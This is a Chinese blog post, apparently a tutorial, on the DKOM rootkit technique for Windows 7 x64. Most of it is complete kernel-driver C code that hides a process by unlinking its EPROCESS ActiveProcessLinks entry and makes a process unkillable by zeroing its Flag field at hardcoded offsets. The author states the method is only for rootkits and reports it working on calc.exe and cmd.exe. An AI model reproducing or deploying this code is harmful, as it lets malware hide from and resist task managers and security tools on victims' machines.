DKOM隐藏和保护进程

主要就是操作链表,以及修改节点内容。

DKOM 隐藏进程和保护进程的本质是操作 EPROCESS 结构体,不同的系统用的时候注意查下相关定义,确定下偏移,下面的数据是以win7 64为例。

关 注 两 个 成 员 : ActiveProcessLinks 和 Flag 。

ActiveProcessLinks 把各个EPROCESS 结构体连接成“双向链表”,ZwQuerySystemInformation
枚举进程时就是枚举这条链表,如果将某个 EPROCESS 从中摘除,ZwQuerySystemInformation
就无法枚举到被摘链的进程了,而依靠此函数的一堆 RING3 的枚举进程函数也失效了;而把Flag 置 0 后,OpenProcess 
函数就会返回失败。不过需要注意的是,用 用 DKOM  来保护进程会有很大的隐患,比如用 调用 CreateProcess  
会 失败,而且 进程 退出 但 不取消保护的话,有一定机率导致蓝屏。一句话,DKOM  保护进程 和 隐藏进程 只适用于 ROOTKIT 
,而不适用于正规软件。实现隐藏进程和保护进程的代码如下:

NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS
*Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);
//目标进程 PEPROCESS audiodg=NULL, dwm=NULL; ULONG op_dat; //偏移定义 #define
PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188 #define PROCESS_FLAG_OFFSET 0x440
//获得EPROCESS PEPROCESS GetProcessObjectByName(char *name) { SIZE_T i;
for(i=100;i<20000;i+=4) { NTSTATUS st; PEPROCESS ep;
st=PsLookupProcessByProcessId((HANDLE)i,&ep); if(NT_SUCCESS(st)) { char
*pn=PsGetProcessImageFileName(ep); if(_stricmp(pn,name)==0) return ep; } }
return NULL; } //摘除双向链表的指定项 VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL
OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry
&& ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry &&
ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink =
ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink
= ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } //隐藏进程
VOID HideProcess(PEPROCESS Process) {
RemoveListEntry((PLIST_ENTRY)((ULONG64)Process+PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
} //保护进程 ULONG ProtectProcess(PEPROCESS Process, BOOLEAN bIsProtect, ULONG v) {
ULONG op; if(bIsProtect) { op=*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET);
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=0; return op; } else {
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=v; return 0; } } VOID test() {
audiodg=GetProcessObjectByName("calc.exe");DbgPrint("calc: %p\n",audiodg);
if(audiodg) { op_dat=ProtectProcess(audiodg,1,0); ObDereferenceObject(audiodg);
} dwm=GetProcessObjectByName("cmd.exe");DbgPrint("cmd: %p\n",dwm); if(dwm) {
HideProcess(dwm); ObDereferenceObject(dwm); } }

执行结果:计算器结束不了,cmd.exe没有进程

但是cmd有这个:

 

技术
©2019-2020 Toolsou All rights reserved,
hive大量小文件处理方法总结最优化方法总结:公式解、数值优化、求解思想JavaScript中的 Call 和 Apply内存溢出和内存泄漏的区别、产生原因以及解决方案创建数据mysql库流程微信小程序(uni-app)url参数传递对象蝗灾虫群上亿只很少发生碰撞 蝗虫要成自动驾驶功臣vue 监听 Treeselect 选择项的改变第十一届蓝桥杯C/C++ 大学 B 组大赛软件类省赛服务器价格有什么差异?